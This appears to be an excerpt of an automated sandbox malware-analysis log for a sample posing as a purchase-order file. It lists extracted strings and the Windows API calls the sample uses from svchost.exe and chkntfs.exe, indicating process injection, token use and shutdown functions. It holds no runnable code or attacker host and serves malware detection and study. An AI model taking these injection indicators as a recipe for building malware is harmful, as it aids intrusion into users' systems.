ai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_7d4c811a-7
            Source: initial sample | Static PE information: Filename: PO_987654345678.exe
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042C973 NtClose | 1_2_0042C973
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72B60 NtClose,LdrInitializeThunk | 1_2_02F72B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk | 1_2_02F72C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk | 1_2_02F72DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F735C0 NtCreateMutant,LdrInitializeThunk | 1_2_02F735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F74340 NtSetContextThread | 1_2_02F74340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F74650 NtSuspendThread | 1_2_02F74650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72AF0 NtWriteFile | 1_2_02F72AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72AD0 NtReadFile | 1_2_02F72AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72AB0 NtWaitForSingleObject | 1_2_02F72AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72BF0 NtAllocateVirtualMemory | 1_2_02F72BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72BE0 NtQueryValueKey | 1_2_02F72BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72BA0 NtEnumerateValueKey | 1_2_02F72BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72B80 NtQueryInformationFile | 1_2_02F72B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72EE0 NtQueueApcThread | 1_2_02F72EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72EA0 NtAdjustPrivilegesToken | 1_2_02F72EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72E80 NtReadVirtualMemory | 1_2_02F72E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72E30 NtWriteVirtualMemory | 1_2_02F72E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72FE0 NtCreateFile | 1_2_02F72FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72FB0 NtResumeThread | 1_2_02F72FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72FA0 NtQuerySection | 1_2_02F72FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72F90 NtProtectVirtualMemory | 1_2_02F72F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72F60 NtCreateProcessEx | 1_2_02F72F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72F30 NtCreateSection | 1_2_02F72F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72CF0 NtOpenProcess | 1_2_02F72CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72CC0 NtQueryVirtualMemory | 1_2_02F72CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72CA0 NtQueryInformationToken | 1_2_02F72CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72C60 NtCreateKey | 1_2_02F72C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72C00 NtQueryInformationProcess | 1_2_02F72C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72DD0 NtDelayExecution | 1_2_02F72DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72DB0 NtEnumerateKey | 1_2_02F72DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72D30 NtUnmapViewOfSection | 1_2_02F72D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72D10 NtMapViewOfSection | 1_2_02F72D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72D00 NtSetInformationFile | 1_2_02F72D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F73090 NtSetValueKey | 1_2_02F73090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F73010 NtOpenDirectoryObject | 1_2_02F73010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F739B0 NtGetContextThread | 1_2_02F739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F73D70 NtOpenThread | 1_2_02F73D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F73D10 NtOpenProcessToken | 1_2_02F73D10
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB4650 NtSuspendThread,LdrInitializeThunk | 3_2_04BB4650
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB4340 NtSetContextThread,LdrInitializeThunk | 3_2_04BB4340
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2CA0 NtQueryInformationToken,LdrInitializeThunk | 3_2_04BB2CA0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2C70 NtFreeVirtualMemory,LdrInitializeThunk | 3_2_04BB2C70
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2C60 NtCreateKey,LdrInitializeThunk | 3_2_04BB2C60
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2DF0 NtQuerySystemInformation,LdrInitializeThunk | 3_2_04BB2DF0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2DD0 NtDelayExecution,LdrInitializeThunk | 3_2_04BB2DD0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2D30 NtUnmapViewOfSection,LdrInitializeThunk | 3_2_04BB2D30
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2D10 NtMapViewOfSection,LdrInitializeThunk | 3_2_04BB2D10
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2E80 NtReadVirtualMemory,LdrInitializeThunk | 3_2_04BB2E80
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2EE0 NtQueueApcThread,LdrInitializeThunk | 3_2_04BB2EE0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2FB0 NtResumeThread,LdrInitializeThunk | 3_2_04BB2FB0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2FE0 NtCreateFile,LdrInitializeThunk | 3_2_04BB2FE0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2F30 NtCreateSection,LdrInitializeThunk | 3_2_04BB2F30
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2AF0 NtWriteFile,LdrInitializeThunk | 3_2_04BB2AF0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2AD0 NtReadFile,LdrInitializeThunk | 3_2_04BB2AD0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2BA0 NtEnumerateValueKey,LdrInitializeThunk | 3_2_04BB2BA0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk | 3_2_04BB2BF0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2BE0 NtQueryValueKey,LdrInitializeThunk | 3_2_04BB2BE0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2B60 NtClose,LdrInitializeThunk | 3_2_04BB2B60
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB35C0 NtCreateMutant,LdrInitializeThunk | 3_2_04BB35C0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB39B0 NtGetContextThread,LdrInitializeThunk | 3_2_04BB39B0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2CF0 NtOpenProcess | 3_2_04BB2CF0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2CC0 NtQueryVirtualMemory | 3_2_04BB2CC0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2C00 NtQueryInformationProcess | 3_2_04BB2C00
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2DB0 NtEnumerateKey | 3_2_04BB2DB0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2D00 NtSetInformationFile | 3_2_04BB2D00
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2EA0 NtAdjustPrivilegesToken | 3_2_04BB2EA0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2E30 NtWriteVirtualMemory | 3_2_04BB2E30
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2FA0 NtQuerySection | 3_2_04BB2FA0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2F90 NtProtectVirtualMemory | 3_2_04BB2F90
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2F60 NtCreateProcessEx | 3_2_04BB2F60
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2AB0 NtWaitForSingleObject | 3_2_04BB2AB0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB2B80 NtQueryInformationFile | 3_2_04BB2B80
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB3090 NtSetValueKey | 3_2_04BB3090
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB3010 NtOpenDirectoryObject | 3_2_04BB3010
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB3D10 NtOpenProcessToken | 3_2_04BB3D10
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BB3D70 NtOpenThread | 3_2_04BB3D70
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_009A9270 NtCreateFile | 3_2_009A9270
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_009A93E0 NtReadFile | 3_2_009A93E0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_009A94D0 NtDeleteFile | 3_2_009A94D0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_009A9570 NtClose | 3_2_009A9570
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_009A96D0 NtAllocateVirtualMemory | 3_2_009A96D0
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F6D5EB CreateFileW,DeviceIoControl,CloseHandle | 0_2_00F6D5EB
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F61201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock | 0_2_00F61201
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F6E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState | 0_2_00F6E8F6
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F72046 | 0_2_00F72046
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F68298 | 0_2_00F68298
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F3E4FF | 0_2_00F3E4FF
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F3676B | 0_2_00F3676B
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F94873 | 0_2_00F94873
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F0CAF0 | 0_2_00F0CAF0
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F2CAA0 | 0_2_00F2CAA0
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F1CC39 | 0_2_00F1CC39
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F36DD9 | 0_2_00F36DD9
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F091C0 | 0_2_00F091C0
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F1B119 | 0_2_00F1B119
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F21394 | 0_2_00F21394
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F21706 | 0_2_00F21706
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F2781B | 0_2_00F2781B
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F219B0 | 0_2_00F219B0
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F1997D | 0_2_00F1997D
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F07920 | 0_2_00F07920
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F27A4A | 0_2_00F27A4A
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F27CA7 | 0_2_00F27CA7
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F21C77 | 0_2_00F21C77
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F39EEE | 0_2_00F39EEE
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F8BE44 | 0_2_00F8BE44
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F21F32 | 0_2_00F21F32
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00EB3630 | 0_2_00EB3630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004188D3 | 1_2_004188D3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402820 | 1_2_00402820
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401160 | 1_2_00401160
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041010D | 1_2_0041010D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00410113 | 1_2_00410113
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403190 | 1_2_00403190
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416A6D | 1_2_00416A6D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416AAF | 1_2_00416AAF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416AB3 | 1_2_00416AB3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00410333 | 1_2_00410333
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040E3B1 | 1_2_0040E3B1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040E3B3 | 1_2_0040E3B3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402C44 | 1_2_00402C44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402C50 | 1_2_00402C50
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004024A0 | 1_2_004024A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042EFD3 | 1_2_0042EFD3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC02C0 | 1_2_02FC02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE0274 | 1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030003E6 | 1_2_030003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F4E3F0 | 1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFA352 | 1_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030001AA | 1_2_030001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD2000 | 1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF81CC | 1_2_02FF81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF41A2 | 1_2_02FF41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC8158 | 1_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDA118 | 1_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F30100 | 1_2_02F30100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5C6E0 | 1_2_02F5C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3C7C0 | 1_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40770 | 1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F64750 | 1_2_02F64750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEE4F6 | 1_2_02FEE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03000591 | 1_2_03000591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF2446 | 1_2_02FF2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE4420 | 1_2_02FE4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40535 | 1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3EA80 | 1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF6BD7 | 1_2_02FF6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFAB40 | 1_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6E8F0 | 1_2_02F6E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F268B8 | 1_2_02F268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300A9A6 | 1_2_0300A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F4A840 | 1_2_02F4A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F42840 | 1_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0 | 1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F56962 | 1_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFEEDB | 1_2_02FFEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F52E90 | 1_2_02F52E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFCE93 | 1_2_02FFCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40E59 | 1_2_02F40E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFEE26 | 1_2_02FFEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F32FC8 | 1_2_02F32FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBEFA0 | 1_2_02FBEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB4F40 | 1_2_02FB4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F60F30 | 1_2_02F60F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE2F30 | 1_2_02FE2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F82F28 | 1_2_02F82F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F30CF2 | 1_2_02F30CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE0CB5 | 1_2_02FE0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40C00 | 1_2_02F40C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3ADE0 | 1_2_02F3ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F58DBF | 1_2_02F58DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDCD1F | 1_2_02FDCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F4AD00 | 1_2_02F4AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5D2F0 | 1_2_02F5D2F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE12ED | 1_2_02FE12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5B2C0 | 1_2_02F5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F452A0 | 1_2_02F452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F8739A | 1_2_02F8739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2D34C | 1_2_02F2D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF132D | 1_2_02FF132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF70E9 | 1_2_02FF70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFF0E0 | 1_2_02FFF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEF0CC | 1_2_02FEF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F470C0 | 1_2_02F470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300B16B | 1_2_0300B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F4B1B0 | 1_2_02F4B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2F172 | 1_2_02F2F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F7516C | 1_2_02F7516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF16CC | 1_2_02FF16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F85630 | 1_2_02F85630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFF7B0 | 1_2_02FFF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F31460 | 1_2_02F31460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFF43F | 1_2_02FFF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030095C3 | 1_2_030095C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDD5B0 | 1_2_02FDD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF7571 | 1_2_02FF7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEDAC6 | 1_2_02FEDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDDAAC | 1_2_02FDDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F85AA0 | 1_2_02F85AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE1AA3 | 1_2_02FE1AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB3A6C | 1_2_02FB3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFA49 | 1_2_02FFFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF7A46 | 1_2_02FF7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB5BF0 | 1_2_02FB5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F7DBF9 | 1_2_02F7DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5FB80 | 1_2_02F5FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFB76 | 1_2_02FFFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F438E0 | 1_2_02F438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FAD800 | 1_2_02FAD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F49950 | 1_2_02F49950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5B950 | 1_2_02F5B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD5910 | 1_2_02FD5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F49EB0 | 1_2_02F49EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F03FD2 | 1_2_02F03FD2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F03FD5 | 1_2_02F03FD5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFFB1 | 1_2_02FFFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F41F92 | 1_2_02F41F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFF09 | 1_2_02FFFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFCF2 | 1_2_02FFFCF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB9C32 | 1_2_02FB9C32
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5FDC0 | 1_2_02F5FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF7D73 | 1_2_02FF7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF1D5A | 1_2_02FF1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F43D40 | 1_2_02F43D40
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C2E4F6 | 3_2_04C2E4F6
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C32446 | 3_2_04C32446
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C24420 | 3_2_04C24420
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C40591 | 3_2_04C40591
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B80535 | 3_2_04B80535
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B9C6E0 | 3_2_04B9C6E0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B7C7C0 | 3_2_04B7C7C0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B80770 | 3_2_04B80770
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04BA4750 | 3_2_04BA4750
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C12000 | 3_2_04C12000
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C381CC | 3_2_04C381CC
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C341A2 | 3_2_04C341A2
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C401AA | 3_2_04C401AA
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C08158 | 3_2_04C08158
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B70100 | 3_2_04B70100
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C1A118 | 3_2_04C1A118
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C002C0 | 3_2_04C002C0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C20274 | 3_2_04C20274
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C403E6 | 3_2_04C403E6
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B8E3F0 | 3_2_04B8E3F0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C3A352 | 3_2_04C3A352
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B70CF2 | 3_2_04B70CF2
